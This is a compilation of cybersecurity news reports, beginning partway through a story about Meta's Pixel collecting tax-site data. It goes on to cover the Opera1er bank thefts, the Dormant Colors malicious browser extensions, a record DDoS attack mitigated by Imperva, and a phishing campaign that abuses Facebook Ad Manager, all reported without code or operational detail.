Based on the report, Facebook could use data from tax websites to power its advertising algorithms even if the person using the tax service does not have a Facebook account. It's yet another example of how Facebook's tools can be utilized to track people across the internet, even if users are unaware of it. According to some statements provided to The Markup, it could have been a mistake.

Ramsey Solutions, a financial advice and software company that uses TaxSlayer, told The Markup that it "NOT KNEW and was never alerted that personal tax information was being gathered by Facebook from the Pixel," and that the company informed TaxSlayer to deactivate the Pixel tracking from SmartTax.

An H&R Block spokesperson said the company takes “protecting our clients’ privacy very seriously, and we are taking steps to mitigate the sharing of client information via pixels.” 

H&R Block further stated in a statement on Wednesday that it had "removed the pixels from its DIY online product to stop any client tax information from being collected."

The Markup discovered the data trail earlier this year while working with Mozilla Rally on a project called "Pixel Hunt," in which participants installed a browser extension that sent the group a copy of data shared with Meta via its pixel.

“Advertisers should not send sensitive information about people through our Business Tools,” a Meta spokesperson told CNBC in a statement. “Doing so is against our policies and we educate advertisers on properly setting up Business tools to prevent this from occurring. Our system is designed to filter out potentially sensitive data it is able to detect.”

Meta considers potentially sensitive data to contain information about income, loan amounts, and debt status.

“Any data in Google Analytics is obfuscated, meaning it is not tied back to an individual and our policies prohibit customers from sending us data that could be used to identify a user,” a Google spokesperson told CNBC. “Additionally, Google has strict policies against advertising to people based on sensitive information.”

A TaxAct spokesperson said in a statement, “The privacy of our customers is very important to all of us at TaxAct, and we continue to comply with all laws and IRS regulations. Data provided to Facebook is used at an aggregate level, not the individual level, by TaxAct to analyze our advertising effectiveness. TaxAct is not using the information provided by its customers and referenced in the report issued by The Markup to target advertising with Facebook.”

A TaxSlayer representative did not immediately respond to CNBC's request for comment.

French Cybercriminals Opera1or Stole up to $30m from Banks

 

Based on a new report published by cybersecurity firm Group-IB, a French-speaking cybercrime group may have stolen more than $30 million from banks and other types of organizations in recent years. 

Group-IB has identified the threat actor as Opera1er. Others have previously investigated some of its activities, naming it Common Raven, Desktop-Group, and NXSMS. The cybersecurity firm is aware of 30 successful attacks carried out between 2019 and 2021, with many of the victims being attacked multiple times. 

The majority of the attacks targeted African banks, but victims also included financial services, mobile banking services, and telecommunications companies. Victims were discovered in 15 countries across Africa, Latin America, and Asia.

Group-IB has confirmed stealing $11 million from victims since 2019, but believes cybercriminals may have stolen more than $30 million. The typical Opera1er attack begins with a spear-phishing email sent to a small number of people within the targeted organisation. Access to domain controllers and banking back-office systems is the goal.

The hackers waited 3-12 months after gaining access to an organization's systems before stealing money. The cybercriminals used the banking infrastructure in the final phase of the operation to transfer money from bank customers to mule accounts, from which it was withdrawn at ATMs by money mules, typically on weekends and public holidays.

“In at least two banks, Opera1er got access to the SWIFT messaging interface,” Group-IB explained. “In one incident, the hackers obtained access to an SMS server which could be used to bypass anti-fraud or to cash out money via payment systems or mobile banking systems. In another incident, Opera1er used an antivirus update server which was deployed in the infrastructure as a pivoting point.”

There does not appear to be any zero-day vulnerabilities or custom malware used by Opera1er. They have exploited old software flaws as well as widely available malware and tools. The majority of the attackers' emails were written in French, according to Group-analysis, IB's and their English and Russian are "quite poor."  

Chrome Extensions with 1M+ Installs Hijack Targets’ Browsers

 

Guardio Labs researchers have discovered Dormant Colors, a new malvertising campaign to deliver malicious Google Chrome extensions. 

Chrome extensions are used to hijack searches and insert affiliate links into web pages. The campaign was dubbed Dormant Colors by experts because the extensions permit color customization. 

“It starts with the trickery malvertising campaign, continues with a crafty novel way to side-load the real malicious code without anyone noticing (until now!), and finally with stealing not only your searches and browsing data, but also affiliation to 10,000 targeted sites — a capability that is easily leveraged for targeted spear phishing, account takeover and credential extraction — all using this powerful network of millions of infected computers worldwide!” reads the post published by the Guardio Labs. 

The researchers discovered at least 30 variants of these extensions in both the Chrome and Edge web stores by mid-October 2022. Over a million people installed malicious browser extensions. Experts discovered that the code of Chrome extensions does not contain malicious components in its initial state, but malicious snippets are later added to the code. The attack chain is based on malvertising messages designed to trick victims into clicking on the install button, as seen in the video. Victims are prompted to install a color-changing extension after clicking the 'OK' or 'Continue' button.

Once installed, these extensions redirect users to various pages that side-load malicious scripts that alter browser behavior. The extensions can hijack searches and return affiliate links in the results. This scheme enables threat actors to profit from traffic to these websites while also stealing data.

According to experts, these malicious extensions are more than just other search hijackers because they include "stealth modules for code updating and telemetry collection, as well as a backbone of servers harvesting data from millions of users." The collected data is used to categorize potential targets and select the best social engineering attack vectors to target and steal from them.

Dormant Colors' operations rely on affiliation with 10,000 targeted sites and a global network of millions of infected computers. The attackers add affiliate tags to the URL, and any purchases made on the site result in a commission for the operators. The researchers released a video that depicts affiliate hijacking for the shopping site 365games.co.uk. The video depicts the address bar being filled with data from affiliation sources. The same method can clearly be used to redirect victims to phishing pages in order to steal credentials for popular services such as Microsoft 365, online banking, and social media platforms.

“This campaign is still up and running, shifting domains, generating new extensions, and re-inventing more color and style-changing functions you can for sure manage without. Adding to that, the code injection technique analyzed here is a vast infrastructure for mitigation and evasion and allows leveraging the campaign to even more malicious activities in the future.” concludes the report that also includes Indicators of Compromise (IoCs) for this campaign. 

“At the end of the day, it’s not only affiliation fees being collected on your back, this is your privacy as well as your internet experience being compromised here, in ways that can target organizations by harvesting credentials and hijacking accounts and financial data. No extension that makes a fine-looking website look dark and ugly is worth it…”

Extended DDoS Attack With 25.3B+ Requests Thwarted

 

On June 27, 2022, the cybersecurity firm Imperva mitigated a DDoS attack with over 25.3 billion requests. The attack, according to experts, sets a new record for Imperva's application DDoS mitigation solution. The attack, which targeted an unnamed Chinese telecommunications company, was notable for its duration, lasting more than four hours and peaking at 3.9 million RPS. 

“On June 27, 2022, Imperva mitigated a single attack with over 25.3 billion requests, setting a new record for Imperva’s application DDoS mitigation solution” reads the announcement. “While attacks with over one million requests per second (RPS) aren’t new, we’ve previously only seen them last for several seconds to a few minutes. On June 27, Imperva successfully mitigated a strong attack that lasted more than four hours and peaked at 3.9 million RPS.”

The Chinese telecommunications company had previously been targeted by large attacks, and experts added that two days later, a new DDoS attack hit its website, albeit for a shorter period of time. This record-breaking attack had an average rate of 1.8 million RPS. To send multiple requests over individual connections, threat actors used HTTP/2 multiplexing or combining multiple packets into one.

The attackers' technique is difficult to detect and can bring down targets with a limited number of resources.

“Since our automated mitigation solution is guaranteed to block DDoS in under three seconds, we estimate that the attack could have reached a much greater rate than our tracked peak of 3.9 million RPS.” continues Imperva.

This attack was launched by a botnet comprised of nearly 170,000 different IP addresses, including routers, security cameras, and compromised servers. The compromised devices can be found in over 180 countries, with the majority of them in the United States, Indonesia, and Brazil.

Akamai mitigated the largest DDoS attack ever against one of its European customers on Monday, September 12, 2022. The malicious traffic peaked at 704.8 Mpps and appears to be the work of the same threat actor as the previous record, which Akamai blocked in July and hit the same customer.

Attackers Abuse Facebook Ad Manager in Credential-Harvesting Campaign

 

Attackers are capitalising on the power of the Facebook brand by sending emails that appear to be from Facebook Ads Manager. The plan is to trick victims into providing their credentials and credit card information on a Facebook lead generation form. 

According to a report published on Tuesday by Avanan's security research team, attackers are sending phishing messages that seem to be urgent warnings from Meta's "Facebook AdManager" team. The messages claim that the victim is not following the company's ad policies and that the ad account will be terminated if the target does not appeal to the fictional violation. 

The "appeal form" link takes visitors to a credential-harvesting site that collects passwords and credit card information using a real Facebook lead-generation form.

An intriguing aspect of the campaign is that, rather than using a harvesting site hosted on a suspect IP somewhere, attackers are exploiting the Facebook ads system to create malicious lead-generation forms. This method kills two birds with one stone: For starters, it deceives many automated checks for malicious links used by email platforms. The Avanan team refers to using legitimate sites as the Static Expressway.

Jeremy Fuchs, cybersecurity researcher for Avanan explained in the report, "Hackers are leveraging sites that appear on static Allow Lists. That means that email security services have broadly decided that these sites are trustworthy, and thus anything related to them comes through to the inbox."

Furthermore, using Facebook Ads forms provides a high level of realism for any of Facebook's eight billion advertising users who are already familiar with the Ads Manager platform and the lead-generation forms it generates.

"For the end user, seeing that their Facebook ad account has been suspended is cause for concern," Fuchs said. "Since it’s a legitimate Facebook link, the user would feel confident continuing on."

While the sites used in this credential harvesting campaign appeared to be legitimate, Fuchs discovered a red flag in the phishing messages: These are typically sent from Outlook accounts such as pageguidelinesfacebook@outlook.com.

Furthermore, the physical address footer in the emails is incorrect. However, if users did not notice these details, they could easily be duped by this hoax. According to earlier this year's research, brand impersonations, or brandjacking, like these elevated by 274% last year as attackers continue to peddle their scams by appearing to come from trustworthy sources. Facebook is a popular platform for phishers to imitate. 

According to a Vade report released this spring, Facebook was the most impersonated brand last year, edging out perennial favourite Microsoft for the top spot. Email attacks increased by 48% in the first half of 2022, as per Abnormal Security research, with more than one in ten attacks impersonating well-known brands. So far in 2022, 256 individual brands have been impersonated, with LinkedIn and Microsoft appearing to be the favourites.